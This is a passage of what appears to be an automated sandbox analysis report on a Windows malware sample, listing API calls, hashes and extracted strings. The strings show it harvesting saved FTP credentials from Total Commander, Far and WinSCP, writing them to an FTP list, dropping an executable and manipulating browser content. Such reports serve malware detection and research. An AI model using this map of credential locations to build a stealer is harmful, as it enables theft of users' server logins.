                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: PrivateProfileString$AllocateHeap
                  • String ID: connections$default$ftp://%s:%s@%s$host$password$username
                  • API String ID: 1411386233-3902919163
                  • Opcode ID: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                  • Opcode Fuzzy Hash: df4bb6539310a0437bdb3c8e886131dc25bb36a28de64beaddf8d5a507c10e60
                  • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                  APIs
                    • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?), ref: 00406A8C
                    • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                  • GetSystemMetrics.USER32(00000000), ref: 004032E5
                  • GetSystemMetrics.USER32(00000001), ref: 004032ED
                  • VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?), ref: 00403309
                  • VirtualProtect.KERNEL32(75C50B88,0000000A,?,?), ref: 00403333
                  • SetUnhandledExceptionFilter.KERNEL32(004032AF), ref: 0040333A
                  • LoadLibraryW.KERNEL32(atl), ref: 00403345
                  • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                  • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                  • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                  • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                  • API String ID: 3066332896-2664446222
                  • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                  • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                  • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403566
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                  • RtlAllocateHeap.NTDLL(00000008,00000C20), ref: 004035B5
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                  • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403681
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: PrivateProfile$String$AllocateHeap$CombinePath
                  • String ID: ftp://%s:%s@%s:%u$pass$port$user
                  • API String ID: 3333933401-2696999094
                  • Opcode ID: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                  • Opcode Fuzzy Hash: 5e129ef3ac38fdb4bd7dae3a7c765ce8d020abefe488821008289a7ec09e8bcb
                  • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • FindFirstFileW.KERNEL32(?,?), ref: 00408280
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                  • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                  • Sleep.KERNEL32(00000000), ref: 00408342
                  • Sleep.KERNEL32(00000000), ref: 00408377
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                  • FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                  • String ID: 5@$5@$.$.
                  • API String ID: 2348139788-1020649804
                  • Opcode ID: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                  • Opcode Fuzzy Hash: 4fc783ec1a5d9276aeedd160a7c130a666ca6b6505fadcd079d5b28b90bd0463
                  • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: c447aa35336725f8732cf0730d8f7f5f0cade8854a5a040e2a03077eb38439fa
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: c447aa35336725f8732cf0730d8f7f5f0cade8854a5a040e2a03077eb38439fa
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Heap$AllocateEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                  • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                  • API String ID: 1603279786-3914982127
                  • Opcode ID: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                  • Opcode Fuzzy Hash: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                  APIs
                  • OleInitialize.OLE32(00000000), ref: 004027F5
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Internet$InitializeOpenOption
                  • String ID: From: true
                  • API String ID: 1176259655-9585188
                  • Opcode ID: 36ad01a7f3a6d2ce224a0f3363f0d94e822c0e02de412e7abea947b50f426571
                  • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                  • Opcode Fuzzy Hash: 36ad01a7f3a6d2ce224a0f3363f0d94e822c0e02de412e7abea947b50f426571
                  • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                  APIs
                    • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                  • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                  • GetLastError.KERNEL32(?), ref: 00402F4E
                  • GetLastError.KERNEL32 ref: 00403237
                  • GetLastError.KERNEL32(?), ref: 00403258
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                  • String ID: .html$From: $Via: $^client=$^key=$file$none
                  • API String ID: 2247176544-3749385445
                  • Opcode ID: 5aad60fe16bdaf4296323caa5e87f39f8fc6d0746fd052f0818feb4d28a1d407
                  • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                  • Opcode Fuzzy Hash: 5aad60fe16bdaf4296323caa5e87f39f8fc6d0746fd052f0818feb4d28a1d407
                  • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 004041FD
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                  • RegCloseKey.ADVAPI32(?), ref: 0040442A
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: HeapOpen$AllocateCloseEnumFree
                  • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                  • API String ID: 755471147-4007225339
                  • Opcode ID: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                  • Opcode Fuzzy Hash: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C20,?), ref: 00404542
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                  • RegCloseKey.ADVAPI32(?), ref: 0040476D
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: AllocateCloseEnumHeapOpen
                  • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                  • API String ID: 3847610418-285550827
                  • Opcode ID: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                  • Opcode Fuzzy Hash: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript$+@
                  • API String ID: 1987340527-3375436608
                  • Opcode ID: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                  APIs
                  • DeleteFileW.KERNEL32(?,74DF0F00), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32(00000000), ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00000626), ref: 00404888
                  • StrStrIA.SHLWAPI(?,?), ref: 00404913
                  • StrStrIA.SHLWAPI(?,?), ref: 00404925
                  • StrStrIA.SHLWAPI(?,?), ref: 00404935
                  • StrStrIA.SHLWAPI(?,?), ref: 00404947
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePath$AllocateCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                  • API String ID: 2372625535-1322549247
                  • Opcode ID: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                  • Opcode Fuzzy Hash: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-2333287219
                  • Opcode ID: 82b565c318c92811cc1fcd7c997887a6c1db696be048d29a5dc49aae136dd5e0
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: 82b565c318c92811cc1fcd7c997887a6c1db696be048d29a5dc49aae136dd5e0
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                  APIs
                  • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: ClearVariant
                  • String ID: _self$http$+@
                  • API String ID: 1473721057-3317424838
                  • Opcode ID: b29b04af0fd8df783a00e80cdbcc61c315534eae5082a51d3f3564c248de0ad6
                  • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                  • Opcode Fuzzy Hash: b29b04af0fd8df783a00e80cdbcc61c315534eae5082a51d3f3564c248de0ad6
                  • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
